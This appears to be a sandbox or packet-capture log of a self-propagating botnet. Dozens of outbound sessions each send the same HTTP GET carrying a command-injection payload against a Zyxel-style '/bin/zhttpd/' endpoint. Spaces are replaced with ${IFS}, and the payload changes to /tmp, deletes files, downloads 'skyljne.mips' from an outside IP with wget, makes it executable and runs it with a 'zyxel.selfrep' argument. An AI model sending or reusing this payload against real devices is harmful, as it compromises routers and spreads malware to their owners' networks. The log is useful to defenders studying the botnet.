                                      Jan 14, 2024 15:51:02.681694031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8470192.168.2.14453368.188.40.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.681731939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8471192.168.2.1454826194.161.160.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.681760073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8472192.168.2.1446442121.19.251.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.681829929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8473192.168.2.1458028141.222.168.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.681844950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8474192.168.2.144566438.190.134.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.681905031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8475192.168.2.146000653.153.88.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.681926966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8476192.168.2.144469286.3.155.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.681969881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8477192.168.2.143487872.165.192.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.682013035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8478192.168.2.1435756206.32.178.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.682065010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8479192.168.2.1451110209.194.252.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.682100058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8480192.168.2.143770063.92.110.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.682142973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8481192.168.2.1433526100.55.231.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.682163954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8482192.168.2.1436630126.103.90.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.682207108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8483192.168.2.1448546177.16.76.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.682255983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8484192.168.2.1455820144.214.92.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.682312965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8485192.168.2.1460274121.171.232.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.682359934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8486192.168.2.1457960188.62.252.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.682403088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8487192.168.2.143303869.158.234.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.682435989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8488192.168.2.14526605.96.221.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.682462931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8489192.168.2.1435182104.233.112.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.682490110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8490192.168.2.143544279.220.152.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.682523012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8491192.168.2.144716851.50.166.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.682578087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8492192.168.2.145954254.117.133.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.682605982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8493192.168.2.145882058.116.18.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.682636023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8494192.168.2.143935261.0.142.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.682681084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8495192.168.2.143993281.13.203.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.682723045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8496192.168.2.145268472.15.13.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.682749033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8497192.168.2.1433082109.185.44.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.682813883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8498192.168.2.1441720129.141.6.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.682847977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8499192.168.2.1434812155.176.27.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.682893038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8500192.168.2.1460650109.68.212.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.682915926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8501192.168.2.145980854.238.6.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.682949066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8502192.168.2.1448816131.91.198.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.682996988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8503192.168.2.143811297.191.71.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.683056116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8504192.168.2.1445076124.235.175.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.683089018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8505192.168.2.145448847.6.189.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.683101892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8506192.168.2.14343789.145.253.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.683167934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8507192.168.2.1438406183.48.122.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.683197975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8508192.168.2.145273670.56.38.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.683249950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8509192.168.2.144652868.244.37.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.683284044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8510192.168.2.145645674.103.27.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.683332920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8511192.168.2.145282688.221.78.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.683360100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8512192.168.2.1441058117.185.54.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.683403969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8513192.168.2.1439774156.176.191.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.683449030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8514192.168.2.1456978108.25.255.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.683469057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8515192.168.2.143530047.16.217.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.683521032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8516192.168.2.144135824.130.121.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.683557987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8517192.168.2.1457198104.228.191.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.683597088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8518192.168.2.144169246.5.12.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.683621883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8519192.168.2.143942217.106.112.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.683665037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8520192.168.2.1443554175.164.81.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.683712006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8521192.168.2.1438706158.159.224.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.683748960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8522192.168.2.1457002110.220.102.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.683798075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8523192.168.2.1447670217.136.170.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.683830023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8524192.168.2.1451698208.8.67.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.683855057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8525192.168.2.143774898.234.143.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.683922052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8526192.168.2.144039053.16.217.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.683948040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8527192.168.2.145603677.96.71.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.683990955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8528192.168.2.144561285.238.99.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.684021950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8529192.168.2.143449285.66.244.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.684051037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8530192.168.2.1450672114.214.84.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.684088945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8531192.168.2.1446534172.143.83.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.684125900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8532192.168.2.1435752208.161.149.177443
                                      TimestampBytes transferredDirectionData
